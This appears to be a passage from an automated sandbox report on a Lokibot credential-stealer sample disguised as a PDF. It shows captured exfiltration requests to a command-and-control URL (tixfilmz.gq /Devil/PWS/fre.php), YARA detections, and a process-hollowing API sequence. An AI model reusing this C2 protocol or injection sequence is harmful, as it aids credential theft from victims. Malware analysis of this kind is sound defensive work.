                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:44:09.924417973 CEST9883OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:44:10.024667978 CEST9883INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:44:10 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A8uhSCBmIXKRlfuG%2F6EDgs3Nh9LOjKk3NdY%2BN9yfSiF3S03bDoGetakChdva7ldiD%2BvTJDuSTvIs7znKB4Lzu7%2BAAco8%2BiNoqOwzPZxCDqD3J%2FLSBTi0p%2Fy1e7TDzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e5081f8b99b98-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  8192.168.2.349750188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:21.832277060 CEST1041OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:21.849293947 CEST1041OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:21.929147005 CEST1042INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:21 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G8RWXJ9cQ2lTbZIEiakeL%2BvJlw7GBQj5v6W8jHCN0RVD8MFGd3iAhGRjGRgY3kgjTkeYk5seGXg0mRicQQEFnc%2Fe90OlZ%2BzjF7i0rG%2F%2F5CMfbS%2FOvsPqEIVJpPmwCg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4dde7991906c-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  9192.168.2.349751188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:22.964431047 CEST1043OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:22.982178926 CEST1043OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 39 00 39 00 32 00 35 00 34 00 37 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz992547DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Aug 11, 2022 06:42:23.073542118 CEST1044INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:23 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NuFLm1%2BetFHr9%2F4RJj%2BfSY56%2Fyp%2F44kO%2BagWi8qLS5jmc3FWNYuuuS4dryA9ihrHDUpS5jRl4o9C1ZwUh9G2L3ovG1mleSN4EqUy7Wz4Vh32S1WXkdj5%2B7O52BO4hw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4de58e089025-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:06:42:05
                  Start date:11/08/2022
                  Path:C:\Users\user\Desktop\Project sheets.pdf.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\Project sheets.pdf.exe"
                  Imagebase:0xe40000
                  File size:177696 bytes
                  MD5 hash:B9FF215D1D69D1A6D7568EECC3ECD245
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.246158939.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.246208717.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Target ID:1
                  Start time:06:42:07
                  Start date:11/08/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Imagebase:0xa40000
                  File size:43176 bytes
                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Target ID:2
                  Start time:06:42:08
                  Start date:11/08/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Imagebase:0xa40000
                  File size:43176 bytes
                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Target ID:3
                  Start time:06:42:08
                  Start date:11/08/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Imagebase:0xa40000
                  File size:43176 bytes
                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000003.00000002.501322554.0000000005046000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000000.243627091.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000002.500576224.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.244592530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.244853180.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.243877833.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000003.00000000.244125189.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:moderate

                  Reset < >

                    Execution Graph

                    Execution Coverage:25.8%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:36
                    Total number of Limit Nodes:3
                    execution_graph 4164 17fca38 ResumeThread 4165 17fcac0 4164->4165 4166 17fc8f8 4167 17fc976 WriteProcessMemory 4166->4167 4168 17fc961 4166->4168 4169 17fc9d8 4167->4169 4168->4167 4170 17fc4f8 4171 17fc56b SetThreadContext 4170->4171 4172 17fc556 4170->4172 4173 17fc5b4 4171->4173 4172->4171 4188 17fc1b4 4189 17fc24d CreateProcessW 4188->4189 4191 17fc3b4 4189->4191 4191->4191 4192 17fca34 ResumeThread 4193 17fcac0 4192->4193 4196 17fc8f4 4197 17fc976 WriteProcessMemory 4196->4197 4198 17fc961 4196->4198 4199 17fc9d8 4197->4199 4198->4197 4200 17fc4f1 4201 17fc56b SetThreadContext 4200->4201 4202 17fc556 4200->4202 4203 17fc5b4 4201->4203 4202->4201 4184 17fc70f 4185 17fc791 VirtualAllocEx 4184->4185 4186 17fc71f 4184->4186 4187 17fc81f 4185->4187 4176 17fc608 ReadProcessMemory 4177 17fc6c7 4176->4177 4178 17fc761 VirtualAllocEx 4179 17fc81f 4178->4179 4180 17fc1c0 4181 17fc24d CreateProcessW 4180->4181 4183 17fc3b4 4181->4183 4183->4183 4194 17fc600 ReadProcessMemory 4195 17fc6c7 4194->4195

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 17f4030-17f403e 1 17f4041-17f404a 0->1 2 17f4040 0->2 3 17f404d-17f404e 1->3 4 17f404c 1->4 2->1 5 17f4051-17f405e 3->5 6 17f4050 3->6 4->3 7 17f4061-17f4066 5->7 8 17f4060 5->8 6->5 9 17f4069-17f406a 7->9 10 17f4068 7->10 8->7 11 17f406d-17f406e 9->11 12 17f406c 9->12 10->9 13 17f4071-17f4072 11->13 14 17f4070 11->14 12->11 15 17f4075 13->15 16 17f4074 13->16 14->13 17 17f4079-17f407e 15->17 18 17f4076 15->18 16->15 20 17f4081-17f4086 17->20 21 17f4080 17->21 18->17 19 17f4078 18->19 19->17 22 17f4089-17f408e 20->22 23 17f4088 20->23 21->20 24 17f4091-17f4092 22->24 25 17f4090 22->25 23->22 26 17f4095-17f409a 24->26 27 17f4094 24->27 25->24 28 17f409d-17f409e 26->28 29 17f409c 26->29 27->26 30 17f40a1-17f40a2 28->30 31 17f40a0 28->31 29->28 32 17f40a5-17f40a6 30->32 33 17f40a4 30->33 31->30 35 17f40a9-17f40b2 32->35 36 17f40a7 32->36 33->32 34 17f40da-17f40fd 33->34 39 17f40ff 34->39 40 17f4104-17f4142 call 17f46d0 34->40 37 17f40b5-17f40bd 35->37 38 17f40b4 35->38 36->35 37->34 38->37 39->40 42 17f4148 40->42 43 17f414f-17f416b 42->43 44 17f416d 43->44 45 17f4174-17f4175 43->45 44->42 46 17f41fe-17f4213 44->46 47 17f42db-17f42f3 44->47 48 17f417a-17f4186 44->48 49 17f4218-17f4224 44->49 50 17f44b4-17f44c6 44->50 51 17f4393-17f43aa 44->51 52 17f41b3-17f41bf 44->52 53 17f4451-17f4463 44->53 54 17f43af-17f43bb 44->54 55 17f432e-17f4337 44->55 56 17f426c-17f42a6 44->56 57 17f44cb-17f44d2 44->57 58 17f42ab-17f42af 44->58 59 17f4468-17f447f 44->59 60 17f41e7-17f41f9 44->60 61 17f43e6-17f43fb 44->61 62 17f4484-17f4488 44->62 63 17f41a4-17f41b1 44->63 64 17f4363-17f4367 44->64 65 17f4242-17f4267 44->65 66 17f4400-17f440c 44->66 45->48 45->57 46->43 73 17f42fa-17f4310 47->73 74 17f42f5 47->74 71 17f418d-17f41a2 48->71 72 17f4188 48->72 81 17f422b-17f423d 49->81 82 17f4226 49->82 50->43 51->43 75 17f41c6-17f41e2 52->75 76 17f41c1 52->76 53->43 85 17f43bd 54->85 86 17f43c2-17f43e1 54->86 79 17f434a-17f4351 55->79 80 17f4339-17f4348 55->80 56->43 69 17f42c2-17f42c9 58->69 70 17f42b1-17f42c0 58->70 59->43 60->43 61->43 77 17f449b-17f44a2 62->77 78 17f448a-17f4499 62->78 63->43 83 17f437a-17f4381 64->83 84 17f4369-17f4378 64->84 65->43 67 17f440e 66->67 68 17f4413-17f4429 66->68 67->68 100 17f442b 68->100 101 17f4430-17f444c 68->101 89 17f42d0-17f42d6 69->89 70->89 71->43 72->71 102 17f4317-17f4329 73->102 103 17f4312 73->103 74->73 75->43 76->75 90 17f44a9-17f44af 77->90 78->90 91 17f4358-17f435e 79->91 80->91 81->43 82->81 88 17f4388-17f438e 83->88 84->88 85->86 86->43 88->43 89->43 90->43 91->43 100->101 101->43 102->43 103->102
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID: |$<z$|$<z$|$<z
                    • API String ID: 0-1860209785
                    • Opcode ID: 628ceef05bb56fb20502a5489122d2ba802b662b9baa967c03ba0feaee5dccf3
                    • Instruction ID: 05416df7e20f0154a2a6c6065fd58f81d1ffd6f092c2e726a8c4569b0bc50776
                    • Opcode Fuzzy Hash: 628ceef05bb56fb20502a5489122d2ba802b662b9baa967c03ba0feaee5dccf3
                    • Instruction Fuzzy Hash: 28E16C75E0464ADFDB14CFA9C4808AFFBB2FF99310B148599C616AB315D334A982CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 108 17f40d8-17f40fd 110 17f40ff 108->110 111 17f4104-17f4142 call 17f46d0 108->111 110->111 113 17f4148 111->113 114 17f414f-17f416b 113->114 115 17f416d 114->115 116 17f4174-17f4175 114->116 115->113 117 17f41fe-17f4213 115->117 118 17f42db-17f42f3 115->118 119 17f417a-17f4186 115->119 120 17f4218-17f4224 115->120 121 17f44b4-17f44c6 115->121 122 17f4393-17f43aa 115->122 123 17f41b3-17f41bf 115->123 124 17f4451-17f4463 115->124 125 17f43af-17f43bb 115->125 126 17f432e-17f4337 115->126 127 17f426c-17f42a6 115->127 128 17f44cb-17f44d2 115->128 129 17f42ab-17f42af 115->129 130 17f4468-17f447f 115->130 131 17f41e7-17f41f9 115->131 132 17f43e6-17f43fb 115->132 133 17f4484-17f4488 115->133 134 17f41a4-17f41b1 115->134 135 17f4363-17f4367 115->135 136 17f4242-17f4267 115->136 137 17f4400-17f440c 115->137 116->119 116->128 117->114 144 17f42fa-17f4310 118->144 145 17f42f5 118->145 142 17f418d-17f41a2 119->142 143 17f4188 119->143 152 17f422b-17f423d 120->152 153 17f4226 120->153 121->114 122->114 146 17f41c6-17f41e2 123->146 147 17f41c1 123->147 124->114 156 17f43bd 125->156 157 17f43c2-17f43e1 125->157 150 17f434a-17f4351 126->150 151 17f4339-17f4348 126->151 127->114 140 17f42c2-17f42c9 129->140 141 17f42b1-17f42c0 129->141 130->114 131->114 132->114 148 17f449b-17f44a2 133->148 149 17f448a-17f4499 133->149 134->114 154 17f437a-17f4381 135->154 155 17f4369-17f4378 135->155 136->114 138 17f440e 137->138 139 17f4413-17f4429 137->139 138->139 171 17f442b 139->171 172 17f4430-17f444c 139->172 160 17f42d0-17f42d6 140->160 141->160 142->114 143->142 173 17f4317-17f4329 144->173 174 17f4312 144->174 145->144 146->114 147->146 161 17f44a9-17f44af 148->161 149->161 162 17f4358-17f435e 150->162 151->162 152->114 153->152 159 17f4388-17f438e 154->159 155->159 156->157 157->114 159->114 160->114 161->114 162->114 171->172 172->114 173->114 174->173
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID: |$<z$|$<z$|$<z
                    • API String ID: 0-1860209785
                    • Opcode ID: cc917f8d7bb6ac5a8c2d74372b2675e3f9484265cfa71bb7f3d8c5ac0678b5bf
                    • Instruction ID: e8148ac672f977547156921da33ee96379cc8e1852ec2ae9dec0f24b12fbb2d7
                    • Opcode Fuzzy Hash: cc917f8d7bb6ac5a8c2d74372b2675e3f9484265cfa71bb7f3d8c5ac0678b5bf
                    • Instruction Fuzzy Hash: CBC10474E0420ADFCB14DFA5C4808AFFBB2FF99310B148569D616AB354D734AA42CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 179 17f40c8-17f40d6 180 17f40d9-17f40fd 179->180 181 17f40d8 179->181 182 17f40ff 180->182 183 17f4104-17f4142 call 17f46d0 180->183 181->180 182->183 185 17f4148 183->185 186 17f414f-17f416b 185->186 187 17f416d 186->187 188 17f4174-17f4175 186->188 187->185 189 17f41fe-17f4213 187->189 190 17f42db-17f42f3 187->190 191 17f417a-17f4186 187->191 192 17f4218-17f4224 187->192 193 17f44b4-17f44c6 187->193 194 17f4393-17f43aa 187->194 195 17f41b3-17f41bf 187->195 196 17f4451-17f4463 187->196 197 17f43af-17f43bb 187->197 198 17f432e-17f4337 187->198 199 17f426c-17f42a6 187->199 200 17f44cb-17f44d2 187->200 201 17f42ab-17f42af 187->201 202 17f4468-17f447f 187->202 203 17f41e7-17f41f9 187->203 204 17f43e6-17f43fb 187->204 205 17f4484-17f4488 187->205 206 17f41a4-17f41b1 187->206 207 17f4363-17f4367 187->207 208 17f4242-17f4267 187->208 209 17f4400-17f440c 187->209 188->191 188->200 189->186 216 17f42fa-17f4310 190->216 217 17f42f5 190->217 214 17f418d-17f41a2 191->214 215 17f4188 191->215 224 17f422b-17f423d 192->224 225 17f4226 192->225 193->186 194->186 218 17f41c6-17f41e2 195->218 219 17f41c1 195->219 196->186 228 17f43bd 197->228 229 17f43c2-17f43e1 197->229 222 17f434a-17f4351 198->222 223 17f4339-17f4348 198->223 199->186 212 17f42c2-17f42c9 201->212 213 17f42b1-17f42c0 201->213 202->186 203->186 204->186 220 17f449b-17f44a2 205->220 221 17f448a-17f4499 205->221 206->186 226 17f437a-17f4381 207->226 227 17f4369-17f4378 207->227 208->186 210 17f440e 209->210 211 17f4413-17f4429 209->211 210->211 243 17f442b 211->243 244 17f4430-17f444c 211->244 232 17f42d0-17f42d6 212->232 213->232 214->186 215->214 245 17f4317-17f4329 216->245 246 17f4312 216->246 217->216 218->186 219->218 233 17f44a9-17f44af 220->233 221->233 234 17f4358-17f435e 222->234 223->234 224->186 225->224 231 17f4388-17f438e 226->231 227->231 228->229 229->186 231->186 232->186 233->186 234->186 243->244 244->186 245->186 246->245
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.245849458.00000000017F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_17f0000_Project sheets.jbxd
                    Similarity
                    • API ID:
                    • String ID: |$<z$|$<z$|$<z
                    • API String ID: 0-1860209785
                    • Opcode ID: 9aaac04da6ea5b9b8796614b3ff721e12bf3310a2c73920f847533e5586ba920
                    • Instruction ID: 8937b0b5d8a25563d6de64bcb43adc5e5397d6bdc4944d9e914f10f9bedff14f
                    • Opcode Fuzzy Hash: 9aaac04da6ea5b9b8796614b3ff721e12bf3310a2c73920f847533e5586ba920
                    • Instruction Fuzzy Hash: 47C10574E0420ADFCB14DFA5C4808AFFBB2FF99310B148569D616A7355E734AA42CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
